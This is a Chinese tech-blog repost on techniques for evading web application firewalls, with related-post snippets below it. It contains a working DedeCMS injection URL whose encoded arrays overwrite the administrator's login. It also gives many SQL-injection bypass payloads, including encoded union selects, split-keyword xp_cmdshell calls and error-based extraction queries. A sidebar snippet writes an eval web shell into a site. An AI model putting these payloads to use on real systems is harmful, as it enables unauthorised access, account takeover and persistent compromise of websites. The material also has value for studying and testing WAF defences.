黑客是如何绕过WAF的

最新推荐文章于 2024-02-21 12:01:09 发布
最新推荐文章于 2024-02-21 12:01:09 发布
阅读量457 收藏 1
点赞数
文章标签: 爬虫 python php
原文链接:https://yq.aliyun.com/articles/480133
版权

1.什么是WAF

 Web Application Firewall  

 通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。  

 目前主要有单设备WAF与云WAF


2.WAF的现状

1.太多数WAF能够拦截较为普通的WEB攻击  
2.大多数WAF没有针对热点漏洞奇葩攻击EXP防御的能力 
3.基本所有的WAF都存在策略性绕过
4.由于waf的业务限制等各种原因导致存在通用绕过 



3.WAF应用分析


举例DEDECMS的一个变量注入漏洞

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35



请求过程示意图(单向)


wKioL1OKlqOitFkeAAErrNBJXBU565.jpg



WAF接收请求会先做什么

wKiom1OKls-gxVajAADTZQueCwk979.jpg



WAF逻辑漏洞及白名单阶段的绕过

  • 搜索引擎白名单(判断引擎方式不严)

  • IP段白名单绕过  

  • 目录白名单绕过

  • 绕过代理直接请求源站(代理模式云WAF) 



WAF确认身份后的事


wKioL1OKlqPSVW6fAAD-PiO0s_Q929.jpg



WAF数据包解析阶段的绕过(通用型绕过)


一、各种编码绕过

1.?id=1 union select pass from admin limit 1 ?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31


2.?id=1 union select pass from admin limit 1 ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1


二、复参数绕过 1.?id=1 union select 1&id=pass from admin

wKiom1OKltDSYlsUAADZqvhVr1M930.jpg



三、异常Method绕过

csadsl /1.php?id=1 and 1=1 HTTP/1.1

Host: www.cnseay.com Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive



四、编码方式绕过(urlencoded/mutipart)

wKioL1OKmCbRd1Y1AAI80YVLXPs820.jpg



解析阶段绕过 --最具杀伤力(一)

1.各种编码绕过

2.复参数绕过(依赖Server)

3.特殊字符污染绕过(截断/%/09-0d等)

4.异常Method绕过

5.编码方式绕过(urlencoded/from-data)

6.超大数据包绕过

7.数据包分块传输绕过



WAF解析数据包后的那些事(单向)


wKiom1OKltCRq2A5AAE4N5NeeOI362.jpg



WAF规则策略阶段的绕过--规则网

一、数据库特殊语法绕过  

1.mysql .符号和~符号和!符号以及+和-号连接

?id=1.union%0aselect@1,2 ,!3,4

wKioL1OKlqSijGT2AAGLf3FTQxE702.jpg



二、关键字拆分绕过

hackwuhen.blog.51cto.com/1.aspx?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')


wKiom1OKltGCTEAqAAFSQpR0C-I498.jpg



三、请求方式差异规则松懈性绕过

GET /id=1 union select 1,2,3,4 ---拦截 POST 

id=1 union select 1,2,3,4 ---绕过  

waf业务限制,POST规则相对松懈



四、冷门函数/标签绕过

1. /1.php?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

2. /1.php?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 

wKioL1OKlqWyABPnAADllXKpZxg339.jpg



WAF规则策略阶段的绕过总结(一)

1.字母大小写转换

2.数据库特殊语法绕过

3.关键字拆分绕过

4.请求方式差异规则松懈性绕过

5.多URL伪静态绕过

6.白字符绕过

7.冷门函数/标签绕过





     本文转自Tar0 51CTO博客,原文链接:http://blog.51cto.com/tar0cissp/1420813,如需转载请自行联系原作者

weixin_33919941
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
织梦php网站提权木马,dedecms过新版安全狗拿shell+提权
weixin_35915385的博客
03-12 279
http://www.mfztdw.net/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=...
当了一回网管,见识了一下php的挂码方法
linux内核探索
10-18 4101
当了一回网管好长时间都没有更新博客了。这回也来写一把非研发的东西。问题起因是有一台有固定IP地址的web服务器,然后装的是windows版的。服务器上跑的是一个php的动态站点。后台用的是dedecms做为建站系统。但是最近以来。这个站点一直被挂马。倒底是windows服务器被攻破,还是网站被人上传了恶意的木马?不得而知。每回把服务器重新恢复,没过一段时间,又会被挂马,在首页最下端出现了“百度联盟”
免费Web网站防火墙-堡塔云WAF
最新发布
2401_82901979的博客
02-21 357
免费的WAF防火墙,首个支持ARM国产系统的WAF防火墙,有超高自由度的自定义拦截规则和可灵活配置各种限制访问,有效防CC攻击、防恶意采集、防刷接口等常见攻击和黑客渗透测试行为,为您的业务网站保驾护航。堡塔云WAF需要占用80、443、33060端口,建议使用单独服务器部署,已经安装了宝塔面板的机器不支持安装云WAF。免费Web网站防火墙。
WAF绕过小技巧
tomyyyyy
09-22 6586
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
织梦最新注入漏洞直接获取管理员帐号
weixin_33696822的博客
06-25 816
把以下代码一个个的复制到地址栏中并确定第一行算是一次确定网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs...
常见的WAF绕过方法
热门推荐
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
那些年我们绕过WAF
05-07
本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF绕过,希望对大家有帮助。
(转)宝塔防火墙什么原理
stableboy的Blog
12-03 3993
    https://www.hostloc.com/thread-466849-1-1.html           include       mime.types;         include proxy.conf;         include luawaf.conf; 这几个 看看. 各位大佬找到了,原来是在  [/www/server/panel/...
第49天-WAF 绕过-漏洞利用之注入上传跨站等绕过
MCTSOG的博客
04-13 2840
思维导图 阿里云 + safedog + BT waf SQL 注入 注入方式 手工注入 简单、不需要考虑CC 防护 工具注入 sqlmap 速度很快,会触发CC防御 safedog CC 绕过 user-agent –delay 代理池:换ip CC 拦截绕过 user-agent:伪装成爬虫白名单 代理池:每秒钟换ip 延时设置: --delay aliyun + safedog 演示 sqlmap工具+代理 +tamper (自写注入规则) –tamper rdog.py #!/usr/bi
绕过 Web 应用程序防火墙 (WAF) 的 5 种方法
MachineGunJoe666
06-06 2499
WAF 是一种网络安全解决方案,用于过滤和阻止恶意网络流量。常见的供应商包括 CloudFlare、AWS、Citrix、Akamai、Radware、Microsoft Azure 和 Barracuda。根据防火墙使用的机制组合,绕过方法可能会有所不同。例如,WAF 可能使用正则表达式来检测恶意流量。正则表达式用于检测字符串中的模式。您可以在此处阅读有关它们的更多信息。WAF 还可以采用基于签名的检测,其中已知的恶意字符串被赋予存储在数据库中的签名,防火墙将根据数据库的内容检查 Web 流量的签名。
WAF介绍及常见绕过方法
qq_41320827的博客
02-20 8398
一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 1.工作原理 对web应用程序客户端发出的流量进行内容检测和验证,检测其安全性与合法性,来屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。 2.WAF分类 软件型WAF 以软件形式装在所保护的服务器...
WAF绕过思路
永远是少年
03-12 3425
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 542
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
dedeCMS解码
06-13 192
var str = 'arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1...
sqlmapapi绕过waf
09-04
绕过WAF使用sqlmapapi,有几种方法可以尝试。首先,可以利用MySQL的版本号注释功能绕过WAF,这是一种常见的绕过方法。此外,还可以使用一些其他技巧,比如使用0xA0代替空格、利用特殊用法如\N和.e浮点绕过WAF,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值